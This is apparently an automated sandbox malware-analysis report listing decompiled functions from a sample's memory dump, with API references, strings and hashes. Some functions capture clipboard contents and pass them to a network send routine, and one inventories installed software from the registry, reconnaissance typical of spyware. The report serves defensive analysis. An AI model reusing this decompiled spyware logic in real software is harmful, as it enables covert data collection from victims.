Instruction Fuzzy Hash: 2BC16D31D00218DBCF18FBA4DC869EEB7B5BF46310F90816AF415A6291EF385E89DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00752CEE, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 83
clipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00752CEE(char* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
				void* __ebx;
				int _t10;
				void* _t20;
				void* _t22;
				void* _t31;
				struct HWND__* _t38;
				void* _t57;
				void* _t61;
				void* _t64;
				void* _t66;

				_t55 = __edx;
				_t10 = OpenClipboard(_t38);
				_t68 = _t10;
				if(_t10 != 0) {
					EmptyClipboard();
					E00741E49( &_a16, _t55, _t68, _t38);
					_t57 = GlobalAlloc(0x2000, E00742489() + 2);
					_t20 = GlobalLock(_t57);
					E00741E49( &_a12, _t55, _t68, _t38);
					_t22 = E00742489();
					E007724E0(_t20, E00741F95(E00741E49( &_a8, _t55, _t68, _t38)), _t22);
					_t66 = _t64 + 0xc;
					GlobalUnlock(_t57);
					SetClipboardData(0xd, _t57);
					CloseClipboard();
					if(OpenClipboard(_t38) != 0) {
						_t61 = GetClipboardData(0xd);
						_t31 = GlobalLock(_t61);
						GlobalUnlock(_t61);
						CloseClipboard();
						_t50 =  !=  ? _t31 : 0x79f724;
						E0074427F(_t38,  &_a36,  !=  ? _t31 : 0x79f724);
						_t55 =  &_a32;
						E0075739C(_t38, _t66 - 0x18,  &_a32);
						_push(0x6b);
						E00744AA4(_t38, 0x7ac780,  &_a32, _t31);
						E00741EF0();
					}
				}
				_t7 =  &_a16; // 0x744538
				E00741E74(_t7, _t55);
				E00741FC7();
				E00741FC7();
				return 0;
			}

0x00752cee
0x00752cef
0x00752cf5
0x00752cf7
0x00752cfd
0x00752d08
0x00752d23
0x00752d26
0x00752d33
0x00752d3a
0x00752d53
0x00752d58
0x00752d5c
0x00752d65
0x00752d82
0x00752d91
0x00752d9f
0x00752da2
0x00752dab
0x00752db1
0x00752dbe
0x00752dc6
0x00752dce
0x00752dd4
0x00752dd9
0x00752de0
0x0075318d
0x0075318d
0x00752d91
0x007533c4
0x007533c8
0x007533d4
0x007533e0
0x007533ed

APIs

OpenClipboard.USER32 ref: 00752CEF
EmptyClipboard.USER32 ref: 00752CFD
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00752D1D
GlobalLock.KERNEL32 ref: 00752D26
GlobalUnlock.KERNEL32(00000000), ref: 00752D5C
SetClipboardData.USER32 ref: 00752D65
CloseClipboard.USER32 ref: 00752D82
OpenClipboard.USER32 ref: 00752D89
GetClipboardData.USER32 ref: 00752D99
GlobalLock.KERNEL32 ref: 00752DA2
GlobalUnlock.KERNEL32(00000000), ref: 00752DAB
CloseClipboard.USER32 ref: 00752DB1

Part of subcall function 00744AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00744B18

Strings

8Et, xrefs: 007533C4

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID: 8Et
API String ID: 3520204547-257909599
Opcode ID: 9c1706580da50761076ecff9965c411e1476b4c7012696e3bb07882a0ad61aa8
Instruction ID: 159f20e4a50c11a40e5cea98ccf1c1d9e47644748684718ab0c36d0ce0fcb2b1
Opcode Fuzzy Hash: 9c1706580da50761076ecff9965c411e1476b4c7012696e3bb07882a0ad61aa8
Instruction Fuzzy Hash: 4C21B735144600EBD304BBB0DC4EABE76A8BF95342F40442EF906C61A2EF2C4E4AC625

Uniqueness

Uniqueness Score: -1.00%

Function 00758E5A, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00758E5A(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x7abeb8 = _t17;
					AppendMenuA(_t17, 0, 0, "Close");
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					Shell_NotifyIconA(2, 0x7abec0);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x7abebc) == 0) {
							ShowWindow( *0x7abebc, 9);
							SetForegroundWindow( *0x7abebc);
						} else {
							ShowWindow( *0x7abebc, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x7abeb8, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L7:
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L7;
			}

0x00758e62
0x00758e65
0x00758f36
0x00758f43
0x00758f4b
0x00758f51
0x00000000
0x00758f51
0x00758e6b
0x00758e70
0x00758f1f
0x00000000
0x00000000
0x00758f28
0x00758f30
0x00758f30
0x00758e7b
0x00758e8b
0x00758e90
0x00758eed
0x00758f07
0x00758f13
0x00758eef
0x00758ef7
0x00758ef7
0x00000000
0x00758eed
0x00758e95
0x00758eb4
0x00758ebd
0x00758ed7
0x00000000
0x00758ed7
0x00758e97
0x00758e9a
0x00758e9d
0x00758ea2
0x00000000
0x00758ea5
0x00758e7d
0x00758e80
0x00758e83
0x00000000

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 00758EA5
GetCursorPos.USER32(?), ref: 00758EB4
SetForegroundWindow.USER32(?), ref: 00758EBD
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00758ED7
Shell_NotifyIconA.SHELL32(00000002,007ABEC0), ref: 00758F28
ExitProcess.KERNEL32 ref: 00758F30
CreatePopupMenu.USER32 ref: 00758F36
AppendMenuA.USER32 ref: 00758F4B

Strings

Close, xrefs: 00758F3C

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: 34f18663e024f4f6e9dffd563dd172d2bad1aa7e5e43d5a2cc4247bc82b0d55a
Instruction ID: 49e58a0339e4e114c563eed3f77f2f8e459275a1a1a5038d856a08e48632fb4b
Opcode Fuzzy Hash: 34f18663e024f4f6e9dffd563dd172d2bad1aa7e5e43d5a2cc4247bc82b0d55a
Instruction Fuzzy Hash: 95211B31148109FFDF455FA4EC0EAAA3B76EB08702F00C219FA05A41B1DFB99E659B19

Uniqueness

Uniqueness Score: -1.00%

Function 0077F5AB, Relevance: 22.8, APIs: 15, Instructions: 296
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0077F5AB(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v21;
				intOrPtr _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				signed int* _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int* _v68;
				void* _v72;
				char _v76;
				signed int _t101;
				signed int _t123;
				signed short _t126;
				void* _t130;
				void* _t134;
				void* _t137;
				void* _t138;
				intOrPtr _t139;
				void* _t141;
				signed int _t142;
				intOrPtr* _t143;
				signed char _t160;
				signed char _t165;
				signed int _t166;
				void* _t168;
				signed int _t170;
				void* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int _t182;
				signed char* _t189;
				signed char* _t190;
				signed int _t192;
				void* _t193;
				intOrPtr _t197;
				short* _t209;
				intOrPtr* _t211;
				intOrPtr* _t215;
				signed int _t216;
				signed int _t217;
				void* _t218;
				void* _t219;

				_t101 =  *0x7aa00c; // 0x67a7e35e
				_v8 = _t101 ^ _t217;
				_t211 = _a4;
				_t170 = 0;
				_v64 = _t211;
				_v32 = 0;
				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v76 = _t211;
				_v72 = 0;
				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
					__eflags =  *(_t211 + 0x8c);
					if( *(_t211 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t211 + 0x8c) = _t170;
					__eflags = 0;
					 *(_t211 + 0x90) = _t170;
					 *_t211 = 0x7977b8;
					 *((intOrPtr*)(_t211 + 0x94)) = 0x797a38;
					 *((intOrPtr*)(_t211 + 0x98)) = 0x797bb8;
					 *((intOrPtr*)(_t211 + 4)) = 1;
					L41:
					return E0076FD1B(_v8 ^ _t217);
				}
				_t106 = _t211 + 8;
				_v44 = 0;
				if( *(_t211 + 8) != 0) {
					L3:
					_v44 = E0077F348(_t172, 1, 4);
					E007801F5(_t170);
					_v32 = E0077F348(_t172, 0x180, 2);
					E007801F5(_t170);
					_v36 = E0077F348(_t172, 0x180, 1);
					E007801F5(_t170);
					_v40 = E0077F348(_t172, 0x180, 1);
					E007801F5(_t170);
					_t197 = E0077F348(_t172, 0x101, 1);
					_v52 = _t197;
					E007801F5(_t170);
					_t219 = _t218 + 0x3c;
					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
						L36:
						E007801F5(_v44);
						E007801F5(_v32);
						E007801F5(_v36);
						E007801F5(_v40);
						_t170 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t123 = _t170;
						do {
							 *(_t123 + _t197) = _t123;
							_t123 = _t123 + 1;
						} while (_t123 < 0x100);
						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t126 = _v28;
						_t235 = _t126 - 5;
						if(_t126 > 5) {
							goto L36;
						}
						_t28 = _t197 + 1; // 0x1
						_v48 = _t126 & 0x0000ffff;
						_t192 = 0xff;
						_t130 = E0078480C(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						_t236 = _t130;
						if(_t130 == 0) {
							goto L36;
						}
						_t34 = _t197 + 1; // 0x1
						_t134 = E0078480C(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						if(_t134 == 0) {
							goto L36;
						}
						if(_v48 <= 1 || _v22 == _t170) {
							L22:
							_v60 = _v32 + 0x100;
							_t137 = E007893AC(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
							_t219 = _t219 + 0x1c;
							if(_t137 == 0) {
								goto L36;
							}
							_t193 = _v32;
							_t138 = _t193 + 0xfe;
							 *_t138 = 0;
							_t179 = _v36;
							_v32 = _t138;
							_t139 = _v40;
							 *(_t179 + 0x7f) = _t170;
							_t180 = _t179 - 0xffffff80;
							 *(_t139 + 0x7f) = _t170;
							_v68 = _t180;
							 *_t180 = _t170;
							_t181 = _t139 + 0x80;
							_v56 = _t181;
							 *_t181 = _t170;
							if(_v48 <= 1 || _v22 == _t170) {
								L32:
								_t182 = 0x3f;
								memcpy(_t193, _t193 + 0x200, _t182 << 2);
								_push(0x1f);
								asm("movsw");
								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
								_push(0x1f);
								asm("movsw");
								asm("movsb");
								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t215 = _v64;
								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t142 | 0xffffffff) == 0) {
										E007801F5( *(_t215 + 0x90) - 0xfe);
										E007801F5( *(_t215 + 0x94) - 0x80);
										E007801F5( *(_t215 + 0x98) - 0x80);
										E007801F5( *((intOrPtr*)(_t215 + 0x8c)));
									}
								}
								_t143 = _v44;
								 *_t143 = 1;
								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
								 *_t215 = _v60;
								 *(_t215 + 0x90) = _v32;
								 *(_t215 + 0x94) = _v68;
								 *(_t215 + 0x98) = _v56;
								 *(_t215 + 4) = _v48;
								L37:
								E007801F5(_v52);
								goto L41;
							} else {
								_t189 =  &_v21;
								while(1) {
									_t160 =  *_t189;
									if(_t160 == 0) {
										break;
									}
									_t216 =  *(_t189 - 1) & 0x000000ff;
									if(_t216 > (_t160 & 0x000000ff)) {
										L30:
										_t189 =  &(_t189[2]);
										if( *(_t189 - 1) != _t170) {
											continue;
										}
										break;
									}
									_t209 = _t193 + 0x100 + _t216 * 2;
									do {
										_t216 = _t216 + 1;
										 *_t209 = 0x8000;
										_t209 = _t209 + 2;
									} while (_t216 <= ( *_t189 & 0x000000ff));
									goto L30;
								}
								goto L32;
							}
						} else {
							_t190 =  &_v21;
							while(1) {
								_t165 =  *_t190;
								if(_t165 == 0) {
									goto L22;
								}
								_t192 =  *(_t190 - 1) & 0x000000ff;
								_t166 = _t165 & 0x000000ff;
								while(_t192 <= _t166) {
									 *((char*)(_t192 + _t197)) = 0x20;
									_t192 = _t192 + 1;
									__eflags = _t192;
									_t166 =  *_t190 & 0x000000ff;
								}
								_t190 =  &(_t190[2]);
								_t242 =  *(_t190 - 1) - _t170;
								if( *(_t190 - 1) != _t170) {
									continue;
								}
								goto L22;
							}
							goto L22;
						}
					}
				}
				_t168 = E0078B0F4(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
				_t219 = _t218 + 0x14;
				if(_t168 != 0) {
					goto L36;
				}
				goto L3;
			}

0x0077f5b3
0x0077f5ba
0x0077f5bf
0x0077f5c2
0x0077f5c5
0x0077f5c8
0x0077f5cb
0x0077f5d1
0x0077f5d4
0x0077f5d7
0x0077f5da
0x0077f5dd
0x0077f5e2
0x0077f902
0x0077f904
0x0077f906
0x0077f906
0x0077f909
0x0077f90f
0x0077f911
0x0077f917
0x0077f91d
0x0077f927
0x0077f931
0x0077f938
0x0077f948
0x0077f948
0x0077f5e8
0x0077f5eb
0x0077f5f0
0x0077f60e
0x0077f618
0x0077f61b
0x0077f62e
0x0077f631
0x0077f63f
0x0077f642
0x0077f650
0x0077f653
0x0077f664
0x0077f667
0x0077f66a
0x0077f66f
0x0077f675
0x0077f8c9
0x0077f8cc
0x0077f8d4
0x0077f8dc
0x0077f8e4
0x0077f8ee
0x0077f8ee
0x00000000
0x0077f69e
0x0077f69e
0x0077f6a0
0x0077f6a0
0x0077f6a3
0x0077f6a4
0x0077f6ba
0x00000000
0x00000000
0x0077f6c0
0x0077f6c3
0x0077f6c6
0x00000000
0x00000000
0x0077f6d3
0x0077f6d6
0x0077f6d9
0x0077f6f6
0x0077f6fb
0x0077f6fe
0x0077f700
0x00000000
0x00000000
0x0077f71a
0x0077f72a
0x0077f72f
0x0077f734
0x00000000
0x00000000
0x0077f73e
0x0077f76b
0x0077f781
0x0077f784
0x0077f789
0x0077f78e
0x00000000
0x00000000
0x0077f794
0x0077f799
0x0077f79f
0x0077f7a2
0x0077f7a5
0x0077f7a8
0x0077f7ab
0x0077f7ae
0x0077f7b5
0x0077f7b8
0x0077f7bb
0x0077f7bd
0x0077f7c3
0x0077f7c6
0x0077f7c8
0x0077f80a
0x0077f80c
0x0077f815
0x0077f81a
0x0077f81d
0x0077f827
0x0077f829
0x0077f82c
0x0077f82e
0x0077f837
0x0077f839
0x0077f83b
0x0077f83c
0x0077f847
0x0077f84c
0x0077f850
0x0077f85e
0x0077f871
0x0077f87f
0x0077f88a
0x0077f88f
0x0077f850
0x0077f892
0x0077f895
0x0077f89b
0x0077f8a4
0x0077f8a9
0x0077f8b2
0x0077f8bb
0x0077f8c4
0x0077f8ef
0x0077f8f2
0x00000000
0x0077f7cf
0x0077f7cf
0x0077f7d2
0x0077f7d2
0x0077f7d6
0x00000000
0x00000000
0x0077f7d8
0x0077f7e1
0x0077f7ff
0x0077f7ff
0x0077f805
0x00000000
0x00000000
0x00000000
0x0077f805
0x0077f7e9
0x0077f7ec
0x0077f7f1
0x0077f7f2
0x0077f7f5
0x0077f7fb
0x00000000
0x0077f7ec
0x00000000
0x0077f807
0x0077f745
0x0077f745
0x0077f748
0x0077f748
0x0077f74c
0x00000000
0x00000000
0x0077f74e
0x0077f752
0x0077f75f
0x0077f757
0x0077f75b
0x0077f75b
0x0077f75c
0x0077f75c
0x0077f763
0x0077f766
0x0077f769
0x00000000
0x00000000
0x00000000
0x0077f769
0x00000000
0x0077f748
0x0077f73e
0x0077f675
0x0077f5fe
0x0077f603
0x0077f608
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 0077F61B
_free.LIBCMT ref: 0077F631
_free.LIBCMT ref: 0077F642
_free.LIBCMT ref: 0077F653
_free.LIBCMT ref: 0077F66A
GetCPInfo.KERNEL32(?,?), ref: 0077F6B2

Part of subcall function 0078B0F4: _free.LIBCMT ref: 0078B15F

_free.LIBCMT ref: 0077F85E
_free.LIBCMT ref: 0077F871
_free.LIBCMT ref: 0077F87F
_free.LIBCMT ref: 0077F88A
_free.LIBCMT ref: 0077F8CC
_free.LIBCMT ref: 0077F8D4
_free.LIBCMT ref: 0077F8DC
_free.LIBCMT ref: 0077F8E4
_free.LIBCMT ref: 0077F8F2

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 1e6015d3a488d7a1e8ea0364210b233e272c4affa0065cbb6c6c76a167a37267
Instruction ID: 1d69ec8f880ee1d7b00d25ee13602e1ca2e5ea8e725e97b03e1c3fa95ea6210c
Opcode Fuzzy Hash: 1e6015d3a488d7a1e8ea0364210b233e272c4affa0065cbb6c6c76a167a37267
Instruction Fuzzy Hash: 87B18C71D40309DEDF119F78C985BAEBBF4BF08340F14806AE599A7242EA79A845CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00757C05, Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 212
registryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00757C05(void* __ebx, void* __ecx) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				char _v1500;
				void* __edi;
				long _t72;
				long _t78;
				long _t206;
				void* _t207;
				intOrPtr* _t208;

				_t129 = __ebx;
				_t207 = __ecx;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v12) == 0) {
					_v16 = 0x400;
					_t206 = 0;
					E00741F6D(__ebx,  &_v64);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v16);
					_push( &_v1500);
					_push(0);
					while(1) {
						_t72 = RegEnumKeyExA(_v12, ??, ??, ??, ??, ??, ??, ??);
						__eflags = _t72 - 0x103;
						if(__eflags == 0) {
							break;
						}
						__eflags = _t72;
						if(_t72 != 0) {
							L8:
							_t206 = _t206 + 1;
							__eflags = _t206;
							_v16 = 0x400;
						} else {
							_t78 = RegOpenKeyExA(_v12,  &_v1500, 0, 0x20019,  &_v8);
							__eflags = _t78;
							if(_t78 == 0) {
								E007509BF( &_v40, _v8, L"DisplayName");
								 *_t208 = L"Publisher";
								E007509BF( &_v184, _v8);
								 *_t208 = L"DisplayVersion";
								E007509BF( &_v160, _v8);
								 *_t208 = L"InstallLocation";
								E007509BF( &_v136, _v8);
								 *_t208 = L"InstallDate";
								E007509BF( &_v112, _v8);
								 *_t208 = L"UninstallString";
								E007509BF( &_v88, _v8);
								__eflags = E00749DB5();
								if(__eflags == 0) {
									E00743311(E007430A6(_t129,  &_v208, E007430A6(_t129,  &_v232, E00744429(_t129,  &_v256, E007430A6(_t129,  &_v280, E00744429(_t129,  &_v304, E007430A6(_t129,  &_v328, E00744429(_t129,  &_v352, E007430A6(_t129,  &_v376, E00744429(_t129,  &_v400, E007430A6(_t129,  &_v424, E00744429(_t129,  &_v448, E00747514( &_v472,  &_v40, __eflags, 0x7a59c4), __eflags,  &_v160), _t206, __eflags, 0x7a59c4), __eflags,  &_v112), _t206, __eflags, 0x7a59c4), __eflags,  &_v184), _t206, __eflags, 0x7a59c4), __eflags,  &_v136), _t206, __eflags, 0x7a59c4), __eflags,  &_v88), _t206, __eflags, 0x7a59c4), _t206, __eflags, "\n"));
									E00741EF0();
									E00741EF0();
									E00741EF0();
									E00741EF0();
									E00741EF0();
									E00741EF0();
									E00741EF0();
									E00741EF0();
									E00741EF0();
									E00741EF0();
									E00741EF0();
									E00741EF0();
								}
								RegCloseKey(_v8);
								E00741EF0();
								E00741EF0();
								E00741EF0();
								E00741EF0();
								E00741EF0();
								E00741EF0();
								goto L8;
							}
						}
						__eflags = 0;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v16);
						_push( &_v1500);
						_push(_t206);
					}
					RegCloseKey(_v12);
					E0074331A(_t129, _t207, __eflags,  &_v64);
					E00741EF0();
				} else {
					E0074427F(__ebx, _t207, 0x79f724);
				}
				return _t207;
			}

0x00757c05
0x00757c25
0x00757c2f
0x00757c45
0x00757c4c
0x00757c4e
0x00757c58
0x00757c59
0x00757c5a
0x00757c5b
0x00757c5c
0x00757c63
0x00757c64
0x00757ed8
0x00757edb
0x00757ee1
0x00757ee6
0x00000000
0x00000000
0x00757c6a
0x00757c6c
0x00757ebe
0x00757ebe
0x00757ebe
0x00757ebf
0x00757c72
0x00757c87
0x00757c8d
0x00757c8f
0x00757ca0
0x00757cae
0x00757cb5
0x00757cc3
0x00757cca
0x00757cd8
0x00757cdf
0x00757cea
0x00757cf1
0x00757cfc
0x00757d03
0x00757d11
0x00757d13
0x00757df3
0x00757dfe
0x00757e09
0x00757e14
0x00757e1f
0x00757e2a
0x00757e35
0x00757e40
0x00757e4b
0x00757e56
0x00757e61
0x00757e6c
0x00757e77
0x00757e77
0x00757e7f
0x00757e88
0x00757e90
0x00757e9b
0x00757ea6
0x00757eb1
0x00757eb9
0x00000000
0x00757eb9
0x00757c8f
0x00757ec6
0x00757ec8
0x00757ec9
0x00757eca
0x00757ecb
0x00757ecf
0x00757ed6
0x00757ed7
0x00757ed7
0x00757eef
0x00757efb
0x00757f03
0x00757c31
0x00757c38
0x00757c38
0x00757f0f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 00757C27
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00757EDB
RegCloseKey.ADVAPI32(?), ref: 00757EEF

Strings

Publisher, xrefs: 00757CAE
UninstallString, xrefs: 00757CFC
InstallLocation, xrefs: 00757CD8
DisplayVersion, xrefs: 00757CC3
InstallDate, xrefs: 00757CEA
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00757C1B
DisplayName, xrefs: 00757C9B

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: fe6975022202f90093b26a6f8fad554e998e548717c2e50856a98274f9ef499f
Instruction ID: 4248b92db015756a717cafaecae4927eda6d88aa2b17427dc446ab80336562c1
Opcode Fuzzy Hash: fe6975022202f90093b26a6f8fad554e998e548717c2e50856a98274f9ef499f
Instruction Fuzzy Hash: 07815671904118EBDB18FB60ED56EEEB37AEF50301F5041AAE90A62151EF785F89CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00789546, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00789546(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x7aa188) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E007801F5(_t46);
							E00788782( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E007801F5(_t47);
							E00788C3C( *((intOrPtr*)(_t74 + 0x88)));
						}
						E007801F5( *((intOrPtr*)(_t74 + 0x7c)));
						E007801F5( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E007801F5( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E007801F5( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E007801F5( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E007801F5( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E007896B9( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x7aa2a8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E007801F5(_t31);
							E007801F5( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E007801F5(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E007801F5(_t74);
			}

0x0078954e
0x00789552
0x0078955a
0x00789563
0x00789568
0x0078956f
0x00789577
0x0078957f
0x0078958a
0x00789590
0x00789591
0x00789599
0x007895a1
0x007895ac
0x007895b2
0x007895b6
0x007895c1
0x007895c7
0x00789568
0x007895c8
0x007895d0
0x007895e3
0x007895f6
0x00789604
0x0078960f
0x00789614
0x0078961d
0x00789625
0x00789626
0x0078962c
0x0078962f
0x00789632
0x00789639
0x0078963b
0x0078963f
0x00789647
0x0078964e
0x00789654
0x00789655
0x00789655
0x0078965c
0x0078965e
0x00789663
0x0078966b
0x00789670
0x00789671
0x00789671
0x00789674
0x00789677
0x0078967a
0x0078967d
0x0078967d
0x0078968f

APIs

___free_lconv_mon.LIBCMT ref: 0078958A

Part of subcall function 00788782: _free.LIBCMT ref: 0078879F
Part of subcall function 00788782: _free.LIBCMT ref: 007887B1
Part of subcall function 00788782: _free.LIBCMT ref: 007887C3
Part of subcall function 00788782: _free.LIBCMT ref: 007887D5
Part of subcall function 00788782: _free.LIBCMT ref: 007887E7
Part of subcall function 00788782: _free.LIBCMT ref: 007887F9
Part of subcall function 00788782: _free.LIBCMT ref: 0078880B
Part of subcall function 00788782: _free.LIBCMT ref: 0078881D
Part of subcall function 00788782: _free.LIBCMT ref: 0078882F
Part of subcall function 00788782: _free.LIBCMT ref: 00788841
Part of subcall function 00788782: _free.LIBCMT ref: 00788853
Part of subcall function 00788782: _free.LIBCMT ref: 00788865
Part of subcall function 00788782: _free.LIBCMT ref: 00788877

_free.LIBCMT ref: 0078957F

Part of subcall function 007801F5: HeapFree.KERNEL32(00000000,00000000,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?), ref: 0078020B
Part of subcall function 007801F5: GetLastError.KERNEL32(?,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?,?), ref: 0078021D

_free.LIBCMT ref: 007895A1
_free.LIBCMT ref: 007895B6
_free.LIBCMT ref: 007895C1
_free.LIBCMT ref: 007895E3
_free.LIBCMT ref: 007895F6
_free.LIBCMT ref: 00789604
_free.LIBCMT ref: 0078960F
_free.LIBCMT ref: 00789647
_free.LIBCMT ref: 0078964E
_free.LIBCMT ref: 0078966B
_free.LIBCMT ref: 00789683

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
